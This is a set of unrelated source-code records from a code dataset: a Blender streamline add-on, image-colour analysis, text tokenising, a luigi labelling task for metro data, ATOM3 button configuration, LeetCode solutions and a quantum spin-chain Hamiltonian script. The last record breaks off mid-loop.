'''\n \n bpy.ops.object.mode_set(mode='OBJECT')\n \n for idx in range(0,len(slobs)):\n ma = bpy.data.materials.new('sl'+str(idx+1))\n ma.diffuse_color[0] = 0.0 #r\n ma.diffuse_color[1] = 1.0 #g\n ma.diffuse_color[2] = 0.0 #b\n #scale intensity by fraction of maxium value\n intensity = ( slprobs[idx+1][0] - min(prob_list) ) / ( max(prob_list) - min(prob_list) )\n ma.diffuse_intensity = intensity\n ma.emit = 2.0 * intensity\n \n print('material intensity = {0}'.format( intensity ))\n \n slobs[idx].data.materials.append(ma)\n \n \n \n def extrudeEdges(self, slmesh, ob):\n ''' Extrudes edges to produce faces on either side of orthogonal direction to \n streamline line segments. Note: Assumes streamlines are\n in the x-y plane with zero z component. 
'''\n \n bpy.ops.object.mode_set(mode='OBJECT')\n bpy.ops.object.editmode_toggle() \n ob.select = True\n \n verts = slmesh.vertices#ob.data.vertices\n nverts = len(verts)\n \n for idx in range(0, nverts-1):\n v0 = verts[idx].co\n v1 = verts[idx+1].co\n segdir = v1 - v0\n \n kvec = mathutils.Vector((0.0,0.0,1.0)) #k unit vector\n ortho = segdir.cross(kvec)\n ortho.normalize()\n ortho *= 0.1 #scale dir of extrusionn\n \n # each segment produces two faces, \n # extruded in oppposite directions\n #bpy.ops.object.mode_set(mode='OBJECT')\n \n # deselect all geometry\n #http://www.blender.org/api/blender_python_api_2_72b_release/bpy.ops.mesh.html\n #bpy.ops.object.mode_set(mode='OBJECT')\n #bpy.ops.object.select_all(action='DESELECT') \n \n bpy.ops.object.mode_set(mode='EDIT')\n bpy.ops.mesh.select_all(action='DESELECT') \n \n bpy.ops.object.mode_set(mode='OBJECT')\n ob.data.edges[idx].select = True\n bpy.ops.object.mode_set(mode='EDIT')\n \n # first face\n bpy.ops.mesh.extrude_edges_indiv(mirror=True) #not sure what mirror parameter does??\n #bpy.ops.mesh.extrude_edges_move() #not sure what mirror parameter does??\n bpy.ops.transform.translate(value=(ortho[0], ortho[1], ortho[2]), mirror = True)\n \n # second face\n #bpy.ops.mesh.extrude_edges_indiv(mirror=False) #not sure what mirror parameter does??\n #bpy.ops.transform.translate(ortho.negate())\n ob.data.edges[idx].select = False\n \n slmesh.update()\n \n \n def execute(self, context): # execute() is called by blender when running the operator.\n \n global prob, slines, MEM\n \n MEM = bpy.context.scene['members'] \n \n seed_x = bpy.context.scene['seed_x']\n seed_y = bpy.context.scene['seed_y']\n seed_z = bpy.context.scene['seed_z']\n \n slines_prob, prob_list = interpProbDensity.calcStreamlineProbs([seed_x, seed_y], slines, MEM+10)\n \n slines_obs = list()\n \n idx = 1\n for sl in slines[1:MEM]:\n ob, me = self.createNewStreamline('sl'+str(idx).zfill(3))\n idx += 1\n verts = self.findVerts(sl) \n edges = self.findEdges(sl) \n \n me.from_pydata( verts, edges, [] )\n me.update()\n bpy.context.scene.update() #make sure the mesh / object is in scene before changing modes\n \n print( 'Extruding streamline {0}'.format( str(idx) ) )\n self.extrudeEdges(me,ob)\n \n slines_obs.append(ob)\n \n self.addProbMaterial(slines_prob, slines_obs, prob_list[1:MEM])\n \n return {'FINISHED'} # this lets blender know the operator finished successfully.\n\ndef register(): \n #bpy.utils.register_class(LoadKDEStreamlines)\n bpy.utils.register_module(__name__)\n\n\ndef unregister():\n #bpy.utils.unregister_class(LoadKDEStreamlines)\n bpy.utils.unregister_module(__name__)\n\n\n# This allows you to run the script directly from blenders text editor\n# to test the addon without having to install it.\nif __name__ == \"__main__\":\n register()\n","sub_path":"src/kdeStreamlineMetricBlender.py","file_name":"kdeStreamlineMetricBlender.py","file_ext":"py","file_size_in_byte":9214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"551109847","text":"# ----------------------------------------- #\n# Date: 2019-05-15 11:47:05\n# Author: Ron K.Y\n# LastEditors: Ron K.Y\n# LastEditTime: 2019-07-02 17:12:43\n# Description:\n# Runtime: ms\n# ----------------------------------------- #\nimport helper_functions\nimport csv\nimport time\n\nif __name__ == \"__main__\":\n\n color_threshold = helper_functions.IMAGE_ANALYSIS_PARAM.param[\"color_threshold\"]\n label_threshold = 
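The extrudeEdges method in the Blender add-on above derives each extrusion direction by crossing the segment vector with the z unit vector, then normalising and scaling by 0.1. That computation in isolation, without mathutils, as a sketch:

def segment_normal(v0, v1, width=0.1):
    # (dx, dy, 0) x (0, 0, 1) = (dy, -dx, 0): a vector orthogonal to the
    # segment, valid because the streamlines are assumed to lie in the
    # x-y plane (the same assumption the add-on's docstring states).
    dx, dy = v1[0] - v0[0], v1[1] - v0[1]
    nx, ny = dy, -dx
    length = (nx * nx + ny * ny) ** 0.5
    return (width * nx / length, width * ny / length)

print(segment_normal((0.0, 0.0), (1.0, 0.0)))   # (0.0, -0.1)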
helper_functions.IMAGE_ANALYSIS_PARAM.param[\"label_threshold\"]\n image_adjusted_size = helper_functions.IMAGE_ANALYSIS_PARAM.param[\"image_adjusted_size\"]\n main_color_num = helper_functions.IMAGE_ANALYSIS_PARAM.param[\"main_color_num\"]\n\n img_list = helper_functions.list_folder_file_to_path(\"C:\\\\projects\\\\img\\\\input\\\\color_label_test0702\")\n output_path = \"C:\\\\projects\\\\img\\\\output\\\\10\"\n csv_path = \"C:\\\\projects\\\\img\\\\output\\\\10\\\\analysis.csv\"\n model_file = \"C:\\\\projects\\\\product_binarization\\\\models\\\\v4_rf.m\"\n k = 0\n t1 = time.time()\n for n in img_list:\n\n img = helper_functions.resize_img(n, image_adjusted_size)\n\n array = helper_functions.image_binarization(img, color_threshold)\n\n main_color_per_rgb = helper_functions.img_kmean(array, main_color_num)\n\n color_label = helper_functions.convert_rgb2label(main_color_per_rgb, label_threshold, model_file)\n # helper_functions.generate_main_color_bar(main_color_per_rgb, output_path, n)\n # Output Analysis Result to CSV file\n with open(csv_path, \"a\", newline=\"\") as csv1:\n csv_write = csv.writer(csv1, dialect='excel')\n writing_list = [n]\n for color_info in main_color_per_rgb:\n writing_list.append(color_info[0])\n writing_list.append(color_info[1])\n i = 0\n for m, v in color_label.items():\n writing_list.append(m)\n writing_list.append(v)\n i += 1\n while i < main_color_num:\n writing_list.append(\"\")\n writing_list.append(\"\")\n i += 1\n csv_write.writerow(writing_list)\n k += 1\n print(k, writing_list)\n if k >= 1000:\n t2 = time.time()\n print(\"100 image done.\")\n print(\"Average Processing Time: \" + str(int(1000*(t2-t1)/k)) + \"ms\")\n input()\n \n # output_json = helper_functions.generate_output_json(color_label, main_color_per_rgb)\n","sub_path":"maincolor_test.py","file_name":"maincolor_test.py","file_ext":"py","file_size_in_byte":2438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"111319352","text":"#!/usr/bin/python\nimport sys\nimport re\n\n\ndef main(enc):\n if enc is None:\n enc = 'utf-8'\n pattern = re.compile('((\\d+)|([a-zA-Z]+))')\n for line in sys.stdin:\n line = line.strip().decode(enc)\n output = pattern.sub(r'####\\1####', line).strip().encode(enc)\n output = ''.join(output.split()).replace('####', ' ').strip()\n sys.stdout.write('%s\\n' % output)\n\n\nif __name__ == '__main__':\n main(None)\n\n","sub_path":"scripts/ai-parse-zh-alphanum.py","file_name":"ai-parse-zh-alphanum.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"355548557","text":"import luigi\nimport luigi.contrib.s3\nimport boto3\nfrom cleaned_ingest_metadata import cleaned_task_metadata\nfrom io import StringIO\nimport pandas as pd\nimport numpy as np\nfrom math import floor\n\nclass label_task(luigi.Task):\n\tbucket = 'dpa-metro-label'\n\tyear = luigi.IntParameter()\n\tmonth = luigi.IntParameter()\n\tstation = luigi.Parameter()\n\n\tdef requires(self):\n\t\treturn cleaned_task_metadata(self.year,self.month,self.station)\n\n\tdef run(self):\n\t\tline = \"line\"\n\t\tstation = \"station\"\n\t\tyear = \"year\"\n\t\tmonth = \"month\"\n\t\tinflux = \"influx\"\n\t\tq3 = \"percentile_0.75\"\n\t\tq1 = \"percentile_0.25\"\n\t\tiqr = \"iqr\"\n\t\tmin_range = \"min_range\"\n\t\tmax_range = \"max_range\"\n\t\tprom = \"mean\"\n\t\tdate = \"date\"\n\n\t\tses = boto3.session.Session(profile_name='omar', region_name='us-east-1')\n\t\ts3_resource = 
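The ai-parse-zh-alphanum.py record above isolates digit and Latin-letter runs inside CJK text by wrapping them in a '####' sentinel, deleting all whitespace, then turning each sentinel back into a single space. It reads Python 2 byte strings from stdin; the same pipeline as a Python 3 function:

import re

pattern = re.compile(r'((\d+)|([a-zA-Z]+))')

def isolate_alphanum(line: str) -> str:
    marked = pattern.sub(r'####\1####', line.strip())   # fence each run
    # Squeeze out the original whitespace, then let the fences become
    # the only separators.
    return ''.join(marked.split()).replace('####', ' ').strip()

print(isolate_alphanum('价格是100元 abc'))   # '价格是 100 元 abc'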
ses.resource('s3')\n\n\t\tobj = s3_resource.Object(\"dpa-metro-cleaned\",\"year={}/month={}/station={}/{}.csv\".format(str(self.year),str(self.month).zfill(2),self.station,self.station.replace(' ', '')))\n\t\tprint(ses)\n\n\t\tfile_content = obj.get()['Body'].read().decode('utf-8')\n\t\tdf = pd.read_csv(StringIO(file_content))\n\n\t\tdf[year] = self.year\n\t\tdf[month] = self.month\n\t\tdf[station] = self.station\n\n\t\tn = floor(df.shape[0] * .7)\n\t\tdf = df.sort_values(by = date, axis = 0)\n\t\tdf = df[0:n]\n\n\t\tdef percentile(n):\n\t\t\tdef percentile_(x):\n\t\t\t\treturn np.percentile(x, n)\n\t\t\tpercentile_.__name__ = 'percentile_%s' % n\n\t\t\treturn percentile_\n\n\t\tdef get_statistics(df):\n\t\t\treturn df.groupby([line, station]).agg([percentile(.25), percentile(.75), 'mean'])[influx].reset_index()\n\n\t\tdef calculate_range(df):\n\t\t\tstats = get_statistics(df)\n\t\t\tstats[iqr] = stats[q3] - stats[q1] \n\t\t\tstats[min_range] = stats[prom] - 1.5 * stats[iqr]\n\t\t\tstats[max_range] = stats[prom] + 1.5 * stats[iqr]\n\t\t\tstats = stats[[line, station, min_range, max_range]]\n\t\t\treturn stats\n\n\t\tdef join_range(df, stats):\n\t\t\treturn df.merge(stats, on = [line, station], how = 'left')\n\n\t\tdef create_label(df): \n\t\t\tdf[\"label\"] = np.where(df[influx] <= df[min_range], 1, np.where(df[influx] <= df[max_range], 2, 3))\n\t\t\treturn df\n\n\t\tfinal = create_label(join_range(df, calculate_range(df)))\n\n\t\twith self.output().open('w') as output_file:\n\t\t\tfinal.to_csv(output_file)\n\n\tdef output(self):\n\t\toutput_path = \"s3://{}/year={}/month={}/station={}/{}.csv\".\\\n\t\tformat(self.bucket,str(self.year),str(self.month).zfill(2),self.station,self.station.replace(' ', ''))\n\t\treturn luigi.contrib.s3.S3Target(path=output_path)\n\nif __name__ == \"__main__\":\n\tluigi.run()\n\n","sub_path":"scripts/label_creation.py","file_name":"label_creation.py","file_ext":"py","file_size_in_byte":2466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"463000528","text":"from graph_ASG_ERmetaMetaModel import *\r\nfrom stickylink import *\r\nfrom widthXfillXdecoration import *\r\nfrom ASG_Buttons import *\r\nfrom ButtonConfig import *\r\nfrom graph_ButtonConfig import *\r\nfrom ATOM3Enum import *\r\nfrom ATOM3String import *\r\nfrom ATOM3BottomType import *\r\nfrom ATOM3Constraint import *\r\nfrom ATOM3Attribute import *\r\nfrom ATOM3Float import *\r\nfrom ATOM3List import *\r\nfrom ATOM3Link import *\r\nfrom ATOM3Connection import *\r\nfrom ATOM3Boolean import *\r\nfrom ATOM3Appearance import *\r\nfrom ATOM3Text import *\r\nfrom ATOM3Integer import *\r\nfrom ATOM3Port import *\r\nfrom ATOM3MSEnum import *\r\n\r\ndef EntityRelationship_META(self, rootNode):\r\n rootNode.RowSize.setValue(1)\r\n rootNode.Formalism_File.setValue('ERModels/ERmetaMetaModel_MM.py')\r\n rootNode.Formalism_Name.setValue('Entity Relationship')\r\n\r\n self.globalPrecondition( rootNode )\r\n\r\n self.obj25=ButtonConfig(self)\r\n\r\n self.obj25.Action.setValue(('ActionButton1', (['Python', 'OCL'], 1), (['PREcondition', 'POSTcondition'], 1), (['EDIT', 'SAVE', 'CREATE', 'CONNECT', 'DELETE', 'DISCONNECT', 'TRANSFORM', 'SELECT', 'DRAG', 'DROP', 'MOVE'], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]), '# This method has as parameters:\\n# - wherex : X Position in window coordinates where the user clicked.\\n# - wherey : Y Position in window coordinates where the user clicked.\\nnewPlace = self.createNewERentity (self, wherex, wherey)\\n'))\r\n 
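The luigi task above labels influx values with an IQR band centred on the mean: 1 below mean - 1.5*IQR, 2 inside the band, 3 above. One thing worth flagging: its percentile(.25) closure passes 0.25 to np.percentile, whose q argument runs 0-100, so it computes the 0.25th percentile rather than the 25th. A standalone sketch of the intended arithmetic with made-up numbers (pandas' quantile takes 0-1 fractions):

import numpy as np
import pandas as pd

influx = pd.Series([10, 12, 11, 13, 50, 9, 12])     # invented sample values
q1, q3, mean = influx.quantile(0.25), influx.quantile(0.75), influx.mean()
iqr = q3 - q1
min_range = mean - 1.5 * iqr    # the band is centred on the mean here,
max_range = mean + 1.5 * iqr    # not on q1/q3 as the classic Tukey fence is
labels = np.where(influx <= min_range, 1,
                  np.where(influx <= max_range, 2, 3))
print(min_range, max_range, labels.tolist())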
self.obj25.Drawing_Mode.setValue((' ', 1))\r\n self.obj25.Drawing_Mode.config = 0\r\n self.obj25.Contents.Text.setValue('Entity')\r\n self.obj25.Contents.Image.setValue('ERModels/Entity.gif')\r\n self.obj25.Contents.lastSelected= \"Image\"\r\n self.obj25.graphClass_= graph_ButtonConfig\r\n if self.genGraphics:\r\n new_obj = graph_ButtonConfig(20.0,20.0,self.obj25)\r\n new_obj.DrawObject(self.UMLmodel)\r\n self.UMLmodel.addtag_withtag(\"ButtonConfig\", new_obj.tag)\r\n new_obj.layConstraints = dict() # Graphical Layout Constraints \r\n new_obj.layConstraints['scale'] = [1.8800000000000006, 0.7799999999999998]\r\n else: new_obj = None\r\n self.obj25.graphObject_ = new_obj\r\n rootNode.addNode(self.obj25)\r\n self.globalAndLocalPostcondition(self.obj25, rootNode)\r\n\r\n self.globalPrecondition( rootNode )\r\n\r\n self.obj26=ButtonConfig(self)\r\n\r\n self.obj26.Action.setValue(('ActionButton1', (['Python', 'OCL'], 1), (['PREcondition', 'POSTcondition'], 1), (['EDIT', 'SAVE', 'CREATE', 'CONNECT', 'DELETE', 'DISCONNECT', 'TRANSFORM', 'SELECT', 'DRAG', 'DROP', 'MOVE'], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]), '# This method has as parameters:\\n# - wherex : X Position in window coordinates where the user clicked.\\n# - wherey : Y Position in window coordinates where the user clicked.\\nnewPlace = self.createNewERrelationship (self, wherex, wherey)\\n\\n'))\r\n self.obj26.Drawing_Mode.setValue((' ', 1))\r\n self.obj26.Drawing_Mode.config = 0\r\n self.obj26.Contents.Text.setValue('Relationship')\r\n self.obj26.Contents.Image.setValue('ERModels/Relationship.gif')\r\n self.obj26.Contents.lastSelected= \"Image\"\r\n self.obj26.graphClass_= graph_ButtonConfig\r\n if self.genGraphics:\r\n new_obj = graph_ButtonConfig(20.0,80.0,self.obj26)\r\n new_obj.DrawObject(self.UMLmodel)\r\n self.UMLmodel.addtag_withtag(\"ButtonConfig\", new_obj.tag)\r\n new_obj.layConstraints = dict() # Graphical Layout Constraints \r\n new_obj.layConstraints['scale'] = [1.8800000000000006, 0.7799999999999998]\r\n else: new_obj = None\r\n self.obj26.graphObject_ = new_obj\r\n rootNode.addNode(self.obj26)\r\n self.globalAndLocalPostcondition(self.obj26, rootNode)\r\n\r\n self.globalPrecondition( rootNode )\r\n\r\n self.obj27=ButtonConfig(self)\r\n\r\n self.obj27.Action.setValue(('Action', (['Python', 'OCL'], 1), (['PREcondition', 'POSTcondition'], 1), (['EDIT', 'SAVE', 'CREATE', 'CONNECT', 'DELETE', 'DISCONNECT', 'TRANSFORM', 'SELECT', 'DRAG', 'DROP', 'MOVE'], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]), '# The parameters of this method are:\\n# - wherex\\n# - wherey\\n\\nself.genCode()\\n\\n\\n\\n\\n'))\r\n self.obj27.Drawing_Mode.setValue((' ', 0))\r\n self.obj27.Drawing_Mode.config = 0\r\n self.obj27.Contents.Text.setValue('Generate Code')\r\n self.obj27.Contents.Image.setValue('ERModels/gen.gif')\r\n self.obj27.Contents.lastSelected= \"Image\"\r\n self.obj27.graphClass_= graph_ButtonConfig\r\n if self.genGraphics:\r\n new_obj = graph_ButtonConfig(20.0,140.0,self.obj27)\r\n new_obj.DrawObject(self.UMLmodel)\r\n self.UMLmodel.addtag_withtag(\"ButtonConfig\", new_obj.tag)\r\n new_obj.layConstraints = dict() # Graphical Layout Constraints \r\n new_obj.layConstraints['scale'] = [1.8800000000000006, 0.7799999999999998]\r\n else: new_obj = None\r\n self.obj27.graphObject_ = new_obj\r\n rootNode.addNode(self.obj27)\r\n self.globalAndLocalPostcondition(self.obj27, rootNode)\r\n\r\n self.globalPrecondition( rootNode )\r\n\r\n self.obj28=ButtonConfig(self)\r\n\r\n self.obj28.Action.setValue(('Action', (['Python', 'OCL'], 1), (['PREcondition', 
'POSTcondition'], 1), (['EDIT', 'SAVE', 'CREATE', 'CONNECT', 'DELETE', 'DISCONNECT', 'TRANSFORM', 'SELECT', 'DRAG', 'DROP', 'MOVE'], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]), '# The parameters of this method are:\\n# - wherex\\n# - wherey\\n\\nself.modelAttributes()\\n\\n\\n\\n\\n\\n'))\r\n self.obj28.Drawing_Mode.setValue((' ', 0))\r\n self.obj28.Drawing_Mode.config = 0\r\n self.obj28.Contents.Text.setValue('Edit Attributes')\r\n self.obj28.Contents.Image.setValue('ERModels/edit.gif')\r\n self.obj28.Contents.lastSelected= \"Image\"\r\n self.obj28.graphClass_= graph_ButtonConfig\r\n if self.genGraphics:\r\n new_obj = graph_ButtonConfig(20.0,200.0,self.obj28)\r\n new_obj.DrawObject(self.UMLmodel)\r\n self.UMLmodel.addtag_withtag(\"ButtonConfig\", new_obj.tag)\r\n new_obj.layConstraints = dict() # Graphical Layout Constraints \r\n new_obj.layConstraints['scale'] = [1.8800000000000006, 0.7799999999999998]\r\n else: new_obj = None\r\n self.obj28.graphObject_ = new_obj\r\n rootNode.addNode(self.obj28)\r\n self.globalAndLocalPostcondition(self.obj28, rootNode)\r\n self.drawConnections( )\r\n\r\nnewfunction = EntityRelationship_META\r\n\r\nloadedMMName = 'Buttons'\r\n","sub_path":"Assignment4/atom3/Kernel/ERModels/EntityRelationship_META.py","file_name":"EntityRelationship_META.py","file_ext":"py","file_size_in_byte":6210,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"139644496","text":"# Time: O(n^2)\n# Space: O(k), k = rowIndex\nclass Solution:\n def getRow(self, rowIndex: 'int') -> 'List[int]':\n if rowIndex < 2:\n return [1] * (rowIndex + 1)\n\n tmp = [1] * (rowIndex + 1)\n for i in range(2, rowIndex + 1):\n for j in range(i-1, 0, -1):\n tmp[j] += tmp[j-1]\n return tmp\n","sub_path":"Python/0119-pascal-triangleII.py","file_name":"0119-pascal-triangleII.py","file_ext":"py","file_size_in_byte":349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"245860707","text":"\"\"\"\n# Employee info\nclass Employee:\n def __init__(self, id: int, importance: int, subordinates: List[int]):\n # It's the unique id of each node.\n # unique id of this employee\n self.id = id\n # the importance value of this employee\n self.importance = importance\n # the id of direct subordinates\n self.subordinates = subordinates\n\"\"\"\n\nfrom collections import deque\n\n\nclass Solution:\n def getImportanceBFS(self, employees: List['Employee'], id: int) -> int:\n \"\"\"\n https://leetcode.com/problems/employee-importance/\n // Time Complexity : O(n)\n 'n' is the number of employees\n // Space Complexity : O(n)\n // Did this code successfully run on Leetcode : Yes\n // Any problem you faced while coding this : No\n // Three line explanation of solution in plain english :\n - Restructure into { employee_id : Employee Object}\n - Level order traversal\n \"\"\"\n imp = 0\n if not employees:\n return imp\n\n emp = {}\n # restructure data\n for employee in employees:\n emp[employee.id] = employee\n\n # level order traversal\n queue = deque()\n queue.append(id)\n while queue:\n cur = queue.pop()\n imp += emp[cur].importance\n for sub in emp[cur].subordinates:\n queue.append(sub)\n return imp\n\n imp = 0\n emp = {}\n\n def getImportance(self, employees: List['Employee'], id: int) -> int:\n \"\"\"\n https://leetcode.com/problems/employee-importance/\n // Time Complexity : O(n)\n 'n' is the number of employees\n // Space Complexity : O(h)\n Max depth in the employee hierarchy\n // Did this code successfully run on Leetcode : 
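In the Pascal's-triangle record above, the inner loop runs right to left so that tmp[j-1] still holds the previous row's value when tmp[j] += tmp[j-1] executes; a left-to-right pass would read entries it had already updated. A short trace makes that concrete:

def get_row(row_index: int) -> list:
    tmp = [1] * (row_index + 1)
    for i in range(2, row_index + 1):
        for j in range(i - 1, 0, -1):    # right to left: tmp[j-1] untouched so far
            tmp[j] += tmp[j - 1]
    return tmp

# Row 4 evolves as [1,1,1,1,1] -> [1,2,1,1,1] -> [1,3,3,1,1] -> [1,4,6,4,1]
print(get_row(4))   # [1, 4, 6, 4, 1]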
Yes\n // Any problem you faced while coding this : No\n // Three line explanation of solution in plain english :\n - Restructure into { employee_id : Employee Object}\n - Level order traversal\n \"\"\"\n\n if not employees:\n return self.imp\n\n # restructure data\n for employee in employees:\n self.emp[employee.id] = employee\n\n self._helper(id)\n return self.imp\n\n def _helper(self, id):\n\n self.imp += self.emp[id].importance\n\n # logic\n for sub_id in self.emp[id].subordinates:\n self._helper(sub_id)","sub_path":"690_employee_importance.py","file_name":"690_employee_importance.py","file_ext":"py","file_size_in_byte":2525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"146106386","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom __future__ import division\nimport math\nimport numpy as np\nimport scipy as sp\nimport pandas\nimport matplotlib.pyplot as plt\nfrom progressbar import ProgressBar\nfrom scipy.sparse import linalg as sparse_linalg\n\nfrom Hamiltonian_Classes import *\nfrom System_Classes import unlocking_System,U1_system\nfrom Symmetry_Classes import *\nfrom Construction_functions import bin_to_int_base_m,int_to_bin_base_m,cycle_bits_state\nfrom Search_functions import find_index_bisection\nfrom State_Classes import zm_state,sym_state,prod_state,bin_state,ref_state\nfrom rw_functions import save_obj,load_obj\nfrom Calculations import level_stats,fidelity,eig_overlap,entropy,site_precession,site_projection,time_evolve_state\n\nfrom matplotlib import rc\nrc('font',**{'family':'sans-serif','sans-serif':['Computer Modern'],'size':26})\n## for Palatino and other serif fonts use:\n#rc('font',**{'family':'serif','serif':['Palatino']})\nrc('text', usetex=True)\n# matplotlib.rcParams['figure.dpi'] = 400\n\nN = 12\npxp = unlocking_System([0],\"periodic\",2,N)\npxp.gen_basis()\npxp_syms = model_sym_data(pxp,[translational_general(pxp,order=3)])\n\nV1_ops = dict()\nV1_ops[0] = Hamiltonian(pxp,pxp_syms)\nV1_ops[0].site_ops[1] = np.array([[0,0],[1,0]])\nV1_ops[0].model = np.array([[0,0,1,0]])\nV1_ops[0].model_coef = np.array([1])\nV1_ops[0].gen(uc_size=3,uc_pos=2)\n\nV1_ops[1] = Hamiltonian(pxp,pxp_syms)\nV1_ops[1].site_ops[1] = np.array([[0,0],[1,0]])\nV1_ops[1].model = np.array([[0,1,0,0]])\nV1_ops[1].model_coef = np.array([1])\nV1_ops[1].gen(uc_size=3,uc_pos=1)\n\nV1_ops[2] = Hamiltonian(pxp,pxp_syms)\nV1_ops[2].site_ops[1] = np.array([[0,1],[0,0]])\nV1_ops[2].model = np.array([[0,1,0,0]])\nV1_ops[2].model_coef = np.array([1])\nV1_ops[2].gen(uc_size=3,uc_pos=2)\n\nV1_ops[3] = Hamiltonian(pxp,pxp_syms)\nV1_ops[3].site_ops[1] = np.array([[0,1],[0,0]])\nV1_ops[3].model = np.array([[0,0,1,0]])\nV1_ops[3].model_coef = np.array([1])\nV1_ops[3].gen(uc_size=3,uc_pos=1)\n\nV1 = V1_ops[0]\nfor n in range(1,len(V1_ops)):\n V1=H_operations.add(V1,V1_ops[n],np.array([1,1]))\n\nV2_ops = dict()\nV2_ops[0] = Hamiltonian(pxp,pxp_syms)\nV2_ops[0].site_ops[1] = np.array([[0,0],[1,0]])\nV2_ops[0].model = np.array([[0,1,0,0]])\nV2_ops[0].model_coef = np.array([1])\nV2_ops[0].gen(uc_size=3,uc_pos=0)\n\nV2_ops[1] = Hamiltonian(pxp,pxp_syms)\nV2_ops[1].site_ops[1] = np.array([[0,0],[1,0]])\nV2_ops[1].model = np.array([[0,0,1,0]])\nV2_ops[1].model_coef = np.array([1])\nV2_ops[1].gen(uc_size=3,uc_pos=0)\n\nV2 = V2_ops[0]\nfor n in range(1,len(V2_ops)):\n V2=H_operations.add(V2,V2_ops[n],np.array([1,1]))\n\nV3_ops = dict()\nV3_ops[0] = Hamiltonian(pxp,pxp_syms)\nV3_ops[0].site_ops[1] = np.array([[0,0],[1,0]])\nV3_ops[0].site_ops[2] = 
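A small caveat on the employee-importance record above: deque.pop() removes from the right, so the loop labelled "level order traversal" actually visits subordinates in depth-first order; popleft() gives true breadth-first order. The summed importance is identical either way, since visit order does not affect a sum. Illustration:

from collections import deque

d = deque([1])
d.extend([2, 3])
print(d.pop())       # 3 -- LIFO, i.e. stack/DFS behaviour
print(d.popleft())   # 1 -- FIFO, what a breadth-first queue needs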
np.array([[0,1],[0,0]])\nV3_ops[0].model = np.array([[0,2,1,2,0]])\nV3_ops[0].model_coef = np.array([1])\nV3_ops[0].gen(uc_size=3,uc_pos=2)\n\nV3_ops[1] = Hamiltonian(pxp,pxp_syms)\nV3_ops[1].site_ops[1] = np.array([[0,0],[1,0]])\nV3_ops[1].site_ops[2] = np.array([[0,1],[0,0]])\nV3_ops[1].model = np.array([[0,2,1,2,0]])\nV3_ops[1].model_coef = np.array([1])\nV3_ops[1].gen(uc_size=3,uc_pos=0)\n\nV3 = V3_ops[0]\nfor n in range(1,len(V3_ops)):\n V3=H_operations.add(V3,V3_ops[n],np.array([1,1]))\n\nHp0_ops = dict()\nHp0_ops[0] = Hamiltonian(pxp,pxp_syms)\nHp0_ops[0].site_ops[1] = np.array([[0,1],[0,0]])\nHp0_ops[0].model = np.array([[0,1,0]])\nHp0_ops[0].model_coef = np.array([1])\nHp0_ops[0].gen(uc_size=3,uc_pos=2)\n\nHp0_ops[1] = Hamiltonian(pxp,pxp_syms)\nHp0_ops[1].site_ops[1] = np.array([[0,0],[1,0]])\nHp0_ops[1].model = np.array([[0,1,0]])\nHp0_ops[1].model_coef = np.array([1])\nHp0_ops[1].gen(uc_size=3,uc_pos=0)\n\nHp0_ops[2] = Hamiltonian(pxp,pxp_syms)\nHp0_ops[2].site_ops[1] = np.array([[0,0],[1,0]])\nHp0_ops[2].model = np.array([[0,1,0]])\nHp0_ops[2].model_coef = np.array([1])\nHp0_ops[2].gen(uc_size=3,uc_pos=1)\n\nHp0 = Hp0_ops[0]\nfor n in range(1,len(Hp0_ops)):\n Hp0=H_operations.add(Hp0,Hp0_ops[n],np.array([1,1]))\n\ncoef = np.array([0.18243653,-0.10390499,0.054452])\nHp = H_operations.add(Hp0,V1,np.array([1,coef[0]]))\nHp = H_operations.add(Hp,V2,np.array([1,coef[1]]))\nHp = H_operations.add(Hp,V3,np.array([1,coef[2]]))\n# Hp = Hp0.sector.matrix()\nHp=Hp.sector.matrix()\nHm = np.conj(np.transpose(Hp))\n\n#generate perturbed Hamiltonian\nV1_ops = dict()\nV1_ops[0] = Hamiltonian(pxp,pxp_syms)\nV1_ops[0].site_ops[1] = np.array([[0,1],[1,0]])\nV1_ops[0].model = np.array([[0,1,0,0]])\nV1_ops[0].model_coef = np.array([1])\nV1_ops[0].gen(uc_size=3,uc_pos=1)\n\nV1_ops[1] = Hamiltonian(pxp,pxp_syms)\nV1_ops[1].site_ops[1] = np.array([[0,1],[1,0]])\nV1_ops[1].model = np.array([[0,0,1,0]])\nV1_ops[1].model_coef = np.array([1])\nV1_ops[1].gen(uc_size=3,uc_pos=2)\n\nV1_ops[2] = Hamiltonian(pxp,pxp_syms)\nV1_ops[2].site_ops[1] = np.array([[0,1],[1,0]])\nV1_ops[2].model = np.array([[0,1,0,0]])\nV1_ops[2].model_coef = np.array([1])\nV1_ops[2].gen(uc_size=3,uc_pos=2)\n\nV1_ops[3] = Hamiltonian(pxp,pxp_syms)\nV1_ops[3].site_ops[1] = np.array([[0,1],[1,0]])\nV1_ops[3].model = np.array([[0,0,1,0]])\nV1_ops[3].model_coef = np.array([1])\nV1_ops[3].gen(uc_size=3,uc_pos=1)\n\nV1 = V1_ops[0]\nfor n in range(1,len(V1_ops)):\n V1=H_operations.add(V1,V1_ops[n],np.array([1,1]))\n\nV2_ops = dict()\nV2_ops[0] = Hamiltonian(pxp,pxp_syms)\nV2_ops[0].site_ops[1] = np.array([[0,1],[1,0]])\nV2_ops[0].model = np.array([[0,0,1,0]])\nV2_ops[0].model_coef = np.array([1])\nV2_ops[0].gen(uc_size=3,uc_pos=0)\n\nV2_ops[1] = Hamiltonian(pxp,pxp_syms)\nV2_ops[1].site_ops[1] = np.array([[0,1],[1,0]])\nV2_ops[1].model = np.array([[0,1,0,0]])\nV2_ops[1].model_coef = np.array([1])\nV2_ops[1].gen(uc_size=3,uc_pos=0)\n\nV2 = V2_ops[0]\nfor n in 